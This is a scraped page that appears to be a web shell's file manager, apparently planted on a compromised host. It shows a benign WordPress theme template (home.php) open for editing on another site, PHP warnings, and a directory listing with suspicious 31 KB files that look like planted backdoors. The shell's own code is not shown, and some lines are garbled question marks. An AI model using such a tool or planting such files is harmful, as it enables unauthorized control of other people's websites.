??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/renovaid.co.uk/wp-content/themes/wise-news/home.php
⬅ Kembali
<?php
/**
* The template for displaying archive pages
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package Wise News
*/
get_header();
$archive_page_title = get_theme_mod( 'wise_news_archive_page_title', '' );
?>
<main id="primary" class="site-main">
<?php
if ( is_front_page() && is_home() ) :
if ( ! empty( $archive_page_title ) ) {
?>
<div class="section-head">
<div class="header-title">
<h3 class="section-title"><?php echo esc_html( $archive_page_title ); ?></h3>
</div>
</div>
<?php
}
endif;
?>
<?php if ( have_posts() ) : ?>
<?php if ( wise_news_is_frontpage_blog() ) { ?>
<header class="page-header">
<?php
the_archive_title( '<h1 class="page-title">', '</h1>' );
the_archive_description( '<div class="archive-description">', '</div>' );
?>
</header><!-- .page-header -->
<?php
$breadcrumb_enable = get_theme_mod( 'wise_news_breadcrumb_enable', true );
if ( $breadcrumb_enable ) :
?>
<div id="breadcrumb-list">
<?php
echo wise_news_breadcrumb(
array(
'show_on_front' => false,
'show_browse' => false,
)
);
?>
</div><!-- #breadcrumb-list -->
<?php
endif;
}
?>
<?php $col_layout = get_theme_mod( 'wise_news_archive_column_layout', 'double-column' ); ?>
<div class="archive-area grid-view <?php echo esc_attr( $col_layout ); ?>">
<?php
/* Start the Loop */
while ( have_posts() ) :
the_post();
/*
* Include the Post-Type-specific template for the content.
* If you want to override this in a child theme, then include a file
* called content-___.php (where ___ is the Post Type name) and that will be used instead.
*/
get_template_part( 'template-parts/content', get_post_type() );
endwhile;
?>
</div>
<?php
do_action( 'wise_news_posts_pagination' );
else :
get_template_part( 'template-parts/content', 'none' );
endif;
?>
</main><!-- #main -->
<?php
if ( wise_news_is_sidebar_enabled() ) {
get_sidebar();
}
get_footer();
Nama
Tipe
Ukuran
Diubah
Aksi
📁 assets
dir
—
2026-05-26 02:31
📁 inc
dir
—
2026-05-26 02:31
📁 languages
dir
—
2026-05-26 02:31
📁 template-parts
dir
—
2026-05-26 02:31
🐘 404.php
php
1.1 KB
2026-05-26 02:31
🐘 archive-restful.php
php
13.7 KB
2026-05-26 02:31
🐘 archive.php
php
1.7 KB
2026-05-26 02:31
🐘 comments.php
php
2 KB
2026-05-26 02:31
🐘 footer-variable.php
php
31 KB
2026-05-26 02:31
🐘 footer.php
php
2.1 KB
2026-05-26 02:31
🐘 front-page.php
php
1.6 KB
2026-05-26 02:31
🐘 functions.php
php
7.3 KB
2026-05-26 02:31
🐘 header-package.php
php
31 KB
2026-05-26 02:31
🐘 header.php
php
5.8 KB
2026-05-26 02:31
🐘 home.php
php
2.2 KB
2026-05-26 02:31
🐘 index-variable.php
php
31 KB
2026-05-26 02:31
🐘 index.php
php
1.7 KB
2026-05-26 02:31
🐘 page.php
php
896 B
2026-05-26 02:31
📝 readme.txt
txt
4.3 KB
2026-05-26 02:31
🖼️ screenshot.png
png
313.2 KB
2026-05-26 02:31
🐘 search.php
php
1.4 KB
2026-05-26 02:31
🐘 sidebar.php
php
368 B
2026-05-26 02:31
🐘 single.php
php
2.6 KB
2026-05-26 02:31
🎨 style.css
css
104.5 KB
2026-05-26 02:31